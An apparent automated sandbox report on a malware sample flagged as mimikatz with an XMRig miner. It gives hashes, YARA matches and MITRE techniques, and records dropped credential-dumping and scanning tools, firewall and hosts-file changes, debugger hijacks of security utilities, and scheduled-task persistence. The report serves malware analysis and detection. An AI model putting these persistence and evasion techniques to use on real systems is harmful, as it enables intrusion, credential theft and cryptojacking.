mimikatz | 224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30/05/2024, 21:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
Size

7.8MB
MD5

1b9c6c103616d1d2995ee12e8e02370c
SHA1

bb5a412d3cdf8e0ea7f42d56cbd437f1dc075bb7
SHA256

224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473
SHA512

6876f45961b1daa01fd2f8f757ece373279d6708d25e94fd3eb98ae4d19ab5d9eecf7ab9c6ba11b54a0455feda6c81170d53d4cf5e03126f7610af68c718cfe7
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2564 created 2136	2564	vbtnwbn.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (29308) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/memory/3240-138-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 41 IoCs

resource	yara_rule
behavioral2/memory/3924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/3924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0009000000023424-6.dat	UPX
behavioral2/memory/2300-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0007000000023459-134.dat	UPX
behavioral2/memory/3240-135-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	UPX
behavioral2/memory/3240-138-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	UPX
behavioral2/files/0x0007000000023464-141.dat	UPX
behavioral2/memory/4452-142-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/4452-146-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/files/0x0007000000023461-163.dat	UPX
behavioral2/memory/2588-164-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/1804-171-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/1696-179-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/4760-183-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-186-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/4980-188-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/4564-192-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/1592-196-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-198-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2196-201-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-204-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/348-206-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2264-210-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/4472-214-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-216-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/3456-219-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-222-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/1748-224-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2444-228-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/3208-231-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/3020-233-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-234-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/5016-236-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2284-238-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	UPX
behavioral2/memory/2588-239-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2588-251-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2588-254-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2588-287-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2588-290-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX
behavioral2/memory/2588-293-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	UPX

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/2588-186-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-198-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-204-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-216-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-222-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-234-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-239-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-251-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-254-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-287-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-290-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig
behavioral2/memory/2588-293-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/3924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0009000000023424-6.dat	mimikatz
behavioral2/memory/2300-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3240-138-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	vbtnwbn.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	vbtnwbn.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4100	netsh.exe
1108	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	vbtnwbn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	vbtnwbn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	vbtnwbn.exe

Executes dropped EXE 29 IoCs

pid	Process
2300	vbtnwbn.exe
2564	vbtnwbn.exe
1692	wpcap.exe
2772	gwbrtisnb.exe
3240	vfshost.exe
4452	wtumnnmbn.exe
2984	xohudmc.exe
3448	ewmksq.exe
2588	ngefld.exe
1804	wtumnnmbn.exe
1840	vbtnwbn.exe
1696	wtumnnmbn.exe
4760	wtumnnmbn.exe
4980	wtumnnmbn.exe
4564	wtumnnmbn.exe
1592	wtumnnmbn.exe
2196	wtumnnmbn.exe
348	wtumnnmbn.exe
2264	wtumnnmbn.exe
4472	wtumnnmbn.exe
3456	wtumnnmbn.exe
1748	wtumnnmbn.exe
2444	wtumnnmbn.exe
3208	wtumnnmbn.exe
3020	wtumnnmbn.exe
5016	wtumnnmbn.exe
2284	wtumnnmbn.exe
3088	nddeaesly.exe
5620	vbtnwbn.exe

Loads dropped DLL 12 IoCs

pid	Process
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
1692	wpcap.exe
2772	gwbrtisnb.exe
2772	gwbrtisnb.exe
2772	gwbrtisnb.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023459-134.dat	upx
behavioral2/memory/3240-135-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	upx
behavioral2/memory/3240-138-0x00007FF62E460000-0x00007FF62E54E000-memory.dmp	upx
behavioral2/files/0x0007000000023464-141.dat	upx
behavioral2/memory/4452-142-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/4452-146-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/files/0x0007000000023461-163.dat	upx
behavioral2/memory/2588-164-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/1804-171-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/1696-179-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/4760-183-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-186-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/4980-188-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/4564-192-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/1592-196-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-198-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2196-201-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-204-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/348-206-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2264-210-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/4472-214-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-216-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/3456-219-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-222-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/1748-224-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2444-228-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/3208-231-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/3020-233-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-234-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/5016-236-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2284-238-0x00007FF64D3B0000-0x00007FF64D40B000-memory.dmp	upx
behavioral2/memory/2588-239-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2588-251-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2588-254-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2588-287-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2588-290-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx
behavioral2/memory/2588-293-0x00007FF65A530000-0x00007FF65A650000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
76	ifconfig.me
77	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4	vbtnwbn.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\ewmksq.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	vbtnwbn.exe
File created	C:\Windows\SysWOW64\ewmksq.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4	vbtnwbn.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	vbtnwbn.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	vbtnwbn.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\cysgelbgy\UnattendGC\specials\ssleay32.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\xdvl-0.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\zlib1.dll	vbtnwbn.exe
File created	C:\Windows\bwbylena\vimpcsvc.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\cnli-1.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\posh-0.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\schoedcl.xml	vbtnwbn.exe
File opened for modification	C:\Windows\bwbylena\spoolsrv.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\svschost.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\vimpcsvc.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\crli-0.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\ucl.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\Shellcode.ini	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\Corporate\mimilib.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\Packet.dll	vbtnwbn.exe
File opened for modification	C:\Windows\bwbylena\vimpcsvc.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\exma-1.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\schoedcl.exe	vbtnwbn.exe
File created	C:\Windows\bwbylena\docmicfg.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\AppCapture64.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\svschost.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\spoolsrv.xml	vbtnwbn.exe
File opened for modification	C:\Windows\cysgelbgy\Corporate\log.txt	cmd.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\ip.txt	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\spoolsrv.xml	vbtnwbn.exe
File opened for modification	C:\Windows\bwbylena\svschost.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\Corporate\mimidrv.sys	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\nddeaesly.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\Corporate\vfshost.exe	vbtnwbn.exe
File created	C:\Windows\ime\vbtnwbn.exe	vbtnwbn.exe
File opened for modification	C:\Windows\bwbylena\schoedcl.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\AppCapture32.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\libxml2.dll	vbtnwbn.exe
File created	C:\Windows\bwbylena\svschost.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\upbdrjv\swrpwe.exe	vbtnwbn.exe
File opened for modification	C:\Windows\cysgelbgy\gtirgeyld\Result.txt	nddeaesly.exe
File opened for modification	C:\Windows\bwbylena\vbtnwbn.exe	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\cysgelbgy\gtirgeyld\Packet.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\docmicfg.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\gwbrtisnb.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\docmicfg.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\vimpcsvc.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\scan.bat	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\wpcap.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\libeay32.dll	vbtnwbn.exe
File created	C:\Windows\bwbylena\vbtnwbn.exe	2024-05-30_1b9c6c103616d1d2995ee12e8e02370c_hacktools_icedid_mimikatz.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\tibe-2.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\svschost.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\vimpcsvc.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\trch-1.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\spoolsrv.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\trfo-2.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\tucl-1.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\docmicfg.exe	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\schoedcl.xml	vbtnwbn.exe
File created	C:\Windows\bwbylena\spoolsrv.xml	vbtnwbn.exe
File created	C:\Windows\bwbylena\schoedcl.xml	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\gtirgeyld\wpcap.dll	vbtnwbn.exe
File created	C:\Windows\cysgelbgy\UnattendGC\specials\coli-0.dll	vbtnwbn.exe
File opened for modification	C:\Windows\bwbylena\docmicfg.xml	vbtnwbn.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1836	sc.exe
1696	sc.exe
3828	sc.exe
4216	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0009000000023424-6.dat	nsis_installer_2
behavioral2/files/0x000c0000000233a4-15.dat	nsis_installer_1
behavioral2/files/0x000c0000000233a4-15.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4384	schtasks.exe
4480	schtasks.exe
4468	schtasks.exe

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wtumnnmbn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wtumnnmbn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wtumnnmbn.exe
